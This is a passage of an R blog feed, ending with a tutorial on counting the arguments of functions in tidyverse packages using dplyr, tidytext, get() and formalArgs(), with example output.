&lt;h3 id="22nd-january---intro-to-r"&gt;22nd January - Intro to R&lt;/h3&gt;
&lt;p&gt;This is a one-day intensive course on R and assumes no prior knowledge. By the end of the course, participants will be able to import, summarise and plot their data. At each step, we avoid using &amp;ldquo;magic code&amp;rdquo;, and stress the importance of understanding what R is doing.&lt;/p&gt;
&lt;h3 id="23rd-january---getting-to-grips-with-the-tidyverse"&gt;23rd January - Getting to Grips with the Tidyverse&lt;/h3&gt;
&lt;p&gt;The tidyverse is essential for any data scientist who deals with data on a day-to-day basis. By focusing on small key tasks, the tidyverse suite of packages removes the pain of data manipulation. This training course covers key aspects of the tidyverse, including {dplyr}, {lubridate}, {tidyr} and tibbles.&lt;/p&gt;
&lt;h3 id="24th-january---advanced-graphics-with-r"&gt;24th January - Advanced Graphics with R&lt;/h3&gt;
&lt;p&gt;The {ggplot2} package can create advanced and informative graphics. This training course stresses understanding - not just one off R scripts. By the end of the session, participants will be familiar with themes, scales and facets, as well as the wider {ggplot2} world of packages.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-training-courses-san-francisco/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Counting Arguments in the Tidyverse</title><link>https://www.jumpingrivers.com/blog/counting-arguments-in-the-tidyverse/</link><pubDate>Thu, 05 Dec 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/counting-arguments-in-the-tidyverse/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/counting-arguments-in-the-tidyverse/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/counting-arguments-in-the-tidyverse/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Before we start anything, I’d like to mention that most of the hard work came from &lt;em&gt;nsaunders&lt;/em&gt; and his great blog post &lt;a href="https://nsaunders.wordpress.com/2018/06/22/idle-thoughts-lead-to-r-internals-how-to-count-function-arguments/amp/" rel="external"&gt;Idle thoughts lead to R internals: how to count function arguments&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let’s get started. The aim of this blog is to capture the number of arguments present in each function with packages of the {tidyverse}. First we need to load the necessary packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidytext&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we need to grab the relevant {tidyverse} packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tpkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tidyverse_packages&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tpkg[17] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;readxl&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(tpkg)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;broom&amp;#34; &amp;#34;cli&amp;#34; &amp;#34;crayon&amp;#34; &amp;#34;dplyr&amp;#34; &amp;#34;dbplyr&amp;#34; &amp;#34;forcats&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We’ve had to reset the 17th element to {readxl} as it gets loaded as &lt;code&gt;readxl\n(&amp;gt;=&lt;/code&gt;, which breaks the next block of code. Now we also need to load in the tidyverse packages. Doing this one by one would be a pain, so I’ve used &lt;code&gt;map()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(tpkg, library, character.only &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now for the actual analysis I’m just going to whack the full code in now, then go through it line by line.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tpkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_tibble&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rename&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rowwise&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(funcs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ls&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)), collapse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest_tokens&lt;/span&gt;(func, funcs, token &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;str_split,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;, to_lower &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.function&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(func, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(num_args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;args&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(func, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)))))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ungroup&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is what the head of &lt;code&gt;pkg&lt;/code&gt; looks like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(pkg)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## package func num_args&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 broom augment 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 broom augment_columns 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 broom bootstrap 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 broom confint_tidy 4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 broom finish_glance 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 broom fix_data_frame 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-counting-arguments-in-the-tidyverse"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="lines-1-4"&gt;Lines &lt;code&gt;1-4&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Lines 1-4 look like this&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tpkg &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_tibble&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rename&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rowwise&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here we are grabbing, the tidyverse packages character vector, converting it to a tibble and renaming the column. We then use &lt;code&gt;rowwise()&lt;/code&gt; so that we can work in a row-wise fashion.&lt;/p&gt;
&lt;h3 id="line-5"&gt;Line 5&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(funcs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ls&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)), collapse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To get a character vector back of the objects within a package, we do &lt;code&gt;ls(&amp;quot;package:package_name&amp;quot;)&lt;/code&gt;. However, we want to store this as a single string, so we need to use our old friend &lt;code&gt;paste0()&lt;/code&gt; to do so. We then use mutate to attach this to the data frame. Our data from now looks like this&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Source: local data frame [6 x 2]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Groups:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## package funcs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 broom argument_glossary,augment,augment_columns,bootstrap,column_gloss…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 cli ansi_hide_cursor,ansi_show_cursor,ansi_with_hidden_cursor,bg_bla…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 crayon %+%,bgBlack,bgBlue,bgCyan,bgGreen,bgMagenta,bgRed,bgWhite,bgYell…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 dplyr %&amp;gt;%,add_count,add_count_,add_row,add_rownames,add_tally,add_tall…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 dbplyr add_op_single,as.sql,base_agg,base_no_win,base_odbc_agg,base_odb…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 forcats %&amp;gt;%,as_factor,fct_anon,fct_c,fct_collapse,fct_count,fct_cross,fc…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="lines-6---7"&gt;Lines 6 - 7&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest_tokens&lt;/span&gt;(func, funcs, token &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;str_split,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;, to_lower &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As we’ve stored the function names as a single string, we can now apply some {tidytext} to turn our data into long data! We do this using the &lt;code&gt;unnest_tokens()&lt;/code&gt; function. Here we are taking the &lt;code&gt;funcs&lt;/code&gt; variable, turning it into &lt;code&gt;func&lt;/code&gt; by splitting it up using &lt;code&gt;str_split()&lt;/code&gt; from {stringr}. The data now looks like this&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Source: local data frame [6 x 2]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Groups:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## package func&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 broom argument_glossary&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 broom augment&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 broom augment_columns&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 broom bootstrap&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 broom column_glossary&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 broom confint_tidy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="line-8"&gt;Line 8&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.function&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(func, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, not every object inside a package is a function. We can use &lt;code&gt;is.function()&lt;/code&gt; to test this. However, as our function names are stored as strings, we must wrap them in the &lt;code&gt;get()&lt;/code&gt; function. For instance,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.function&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;augment&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.function&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;augment&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;What if we have conflicts in function names? We can also specify the package our function is from, using the argument &lt;code&gt;pos&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.function&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;augment&amp;#34;&lt;/span&gt;, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;package:broom&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can then use this condition within a filter command to remove any objects that aren’t functions&lt;/p&gt;
&lt;h3 id="lines-9---end"&gt;Lines 9 - end&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(num_args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;args&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(func, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;package:&amp;#34;&lt;/span&gt;, package)))))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ungroup&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It is possible to withdraw the arguments of a function using the &lt;code&gt;formalArgs()&lt;/code&gt; function. However, this does not work on primitive functions&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;formalArgs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;add&amp;#34;&lt;/span&gt;, pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;package:magrittr&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## NULL&lt;/span&gt;
